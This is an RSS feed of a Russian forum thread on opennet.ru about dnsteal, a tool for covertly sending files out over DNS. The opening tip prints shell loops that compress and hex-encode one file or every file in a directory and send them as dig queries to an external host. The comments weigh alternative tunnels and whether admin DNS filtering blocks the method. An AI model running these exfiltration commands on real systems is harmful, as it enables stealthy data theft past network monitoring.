<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Раздел полезных советов: Скрытая отправка файлов через DNS</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html</link>
    <description>В рамках проекта https://github.com/m57/dnsteal развивается фиктивный DNS-сервер, позволяющий организовать скрытую отправку файлов по протоколу DNS, используя штатные системные утилиты резолвинга. Для уменьшения трафика поддерживается сжатие передаваемого содержимого.&lt;br&gt;&lt;br&gt;&lt;br&gt;Запускаем сервер (&quot;-z&quot; - включает сжатие):&lt;br&gt;&lt;br&gt;   python dnsteal.py 192.168.1.1 -z&lt;br&gt;&lt;br&gt;&lt;br&gt;Для отправки файла send.txt на внешний хост 192.168.1.1, на котором запущен dnsteal, достаточно выполнить:&lt;br&gt;&lt;br&gt;   for b in $(gzip -c send.txt &amp;#124; xxd -p); do dig &#064;192.168.1.1 $b.filename.com; done&lt;br&gt;&lt;br&gt;Для отправки всех файлов из текущей директории&lt;br&gt;&lt;br&gt;   for filename in $(ls); do for b in $(gzip -c $filename &amp;#124; xxd -p); do dig +short &#064;192.168.1.1 &#037;b.$filename.com; done; done&lt;br&gt;&lt;br&gt;&lt;br&gt;URL: &lt;br&gt;Обсуждается: http://www.opennet.ru/tips/info/2922.shtml&lt;br&gt;</description>

<item>
    <title>Скрытая отправка файлов через DNS (freehck)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html#25</link>
    <pubDate>Thu, 03 Nov 2016 12:50:21 GMT</pubDate>
    <description>Имхо легче туннель через 443й порт повесить, используя, скажем, sslh. 443й обычно открыт, а что ты там внутри туннеля шлёшь никто всё равно не прочитает. А 53й с весьма большой вероятностью может быть и закрыт.&lt;br&gt;</description>
</item>

<item>
    <title>Скрытая отправка файлов через DNS (AdVv)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html#24</link>
    <pubDate>Thu, 30 Jun 2016 12:43:06 GMT</pubDate>
    <description>Наводящий вопрос: откуда &quot;днс на шлюзе местного админа&quot; берет информацию о неизвестных доменных адресах ?&lt;br&gt;</description>
</item>

<item>
    <title>Скрытая отправка файлов через DNS (nuclight)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html#23</link>
    <pubDate>Fri, 27 Nov 2015 11:29:01 GMT</pubDate>
    <description>dnscrypt от djb сто лет как&lt;br&gt;</description>
</item>

<item>
    <title>Скрытая отправка файлов через DNS (Pahanivo)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html#22</link>
    <pubDate>Tue, 24 Nov 2015 12:11:01 GMT</pubDate>
    <description>вот именно, что вся эта бредовая идея идет в опу, если админ держить днс на шлюзе и фильтрует внешние, а он скорей всего так и делает.&lt;br&gt;</description>
</item>

<item>
    <title>Скрытая отправка файлов через DNS (DmA)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html#21</link>
    <pubDate>Sun, 22 Nov 2015 07:25:35 GMT</pubDate>
    <description>лучше бы придумали как DNS пакеты нельзя было ни подменить, ни посмотреть что там внутри ходит...&lt;br&gt;</description>
</item>

<item>
    <title>Скрытая отправка файлов через DNS (Аноним)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html#20</link>
    <pubDate>Fri, 20 Nov 2015 19:04:34 GMT</pubDate>
    <description>Если вы кодер, а злой админ закрыл вконтактик, то что вам мешает пробросить ssh-tunnel?&lt;br&gt;</description>
</item>

<item>
    <title>Скрытая отправка файлов через DNS (анонимаус)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html#19</link>
    <pubDate>Tue, 27 Oct 2015 07:56:04 GMT</pubDate>
    <description>администраторам localnet чтоли? &lt;br&gt;&lt;br&gt;вся прелесть iodine в том, что он работает и за firewall (и wifi, не авторизовавшись, но те которые резолвят внешние имена), кто же вас пустит на внешний сервер напрямую (dig &#064;server) из сети, которая за firewall ?&lt;br&gt;</description>
</item>

<item>
    <title>Скрытая отправка файлов через DNS (НьюВасюковец)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html#18</link>
    <pubDate>Mon, 26 Oct 2015 10:28:13 GMT</pubDate>
    <description>&amp;gt; А можно поподробней про реализацию?&lt;br&gt;&lt;br&gt;таких примеров жопой жуй&lt;br&gt;http://habrahabr.ru/post/65322/&lt;br&gt;</description>
</item>

<item>
    <title>Скрытая отправка файлов через DNS (НьюВасюковец)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/105052.html#17</link>
    <pubDate>Mon, 26 Oct 2015 10:24:13 GMT</pubDate>
    <description>Без примера -это просто трепология.&lt;br&gt;</description>
</item>

</channel>
</rss>
